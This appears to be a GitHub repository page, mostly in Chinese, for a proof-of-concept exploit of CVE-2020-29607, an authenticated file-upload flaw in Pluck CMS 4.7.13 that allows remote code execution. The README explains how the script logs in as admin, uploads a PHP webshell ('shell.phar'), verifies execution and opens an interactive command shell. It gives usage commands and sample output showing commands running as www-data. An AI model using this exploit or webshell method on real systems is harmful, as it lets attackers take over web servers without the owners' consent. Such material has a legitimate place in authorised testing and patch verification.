estebanzarate/CVE-2020-29607-Pluck-CMS-4.7.13-Authenticated-File-Upload-RCE-PoC

GitHub: estebanzarate/CVE-2020-29607-Pluck-CMS-4.7.13-Authenticated-File-Upload-RCE-PoC

针对 Pluck CMS 4.7.13 及以下版本认证后文件上传 RCE 漏洞的概念验证与利用脚本。

Stars: 1 | Forks: 0

# CVE-2020-29607 — Pluck CMS <= 4.7.13 认证文件上传 RCE (PoC) ## 工作原理 1. 使用提供的管理员密码进行认证。 2. 通过管理员文件管理器上传一个名为 `shell.phar` 的 PHP webshell。 3. 通过请求该 shell 并运行 `id` 命令来验证执行情况。 4. 针对上传的 webshell 开启交互式命令循环。 ## 环境要求 - Python 3 - 安装依赖: ``` python3 -m venv venv source venv/bin/activate python3 -m pip install requests prompt_toolkit ``` ## 使用方法 ``` # Pluck at root python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD # Pluck in a subdirectory python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD --path /pluck ``` **示例:** ``` $ python3 exploit.py -u http://10.10.10.10 -p admin123 [*] Logging in... [+] Logged in [*] Uploading webshell... [+] Webshell uploaded [*] Shell URL: http://10.10.10.10/files/shell.phar [+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data) [+] Shell opened. Type 'exit' or Ctrl+C to quit. Shell> whoami www-data ``` ## 参考资料 - [CVE-2020-29607](https://nvd.nist.gov/vuln/detail/CVE-2020-29607) - [EDB-49909](https://www.exploit-db.com/exploits/49909) - [Ron Jost (Hacker5preme) 的原始 PoC](https://github.com/Hacker5preme/Exploits) ## 致谢 - **发现与原始漏洞利用:** Ron Jost (Hacker5preme) - **Python 3 移植与交互式 shell:** [Esteban Zárate](https://github.com/estebanzarate)
标签:CISA项目, CMS漏洞, CVE-2020-29607, GetShell, Maven, PHAR, Pluck CMS, PoC, Python, RCE, Webshell, 命令执行, 攻击脚本, 文件上传漏洞, 文件管理器, 无后门, 暴力破解, 漏洞验证, 编程工具, 网络安全, 认证后漏洞, 远程代码执行, 逆向工具, 隐私保护, 高危漏洞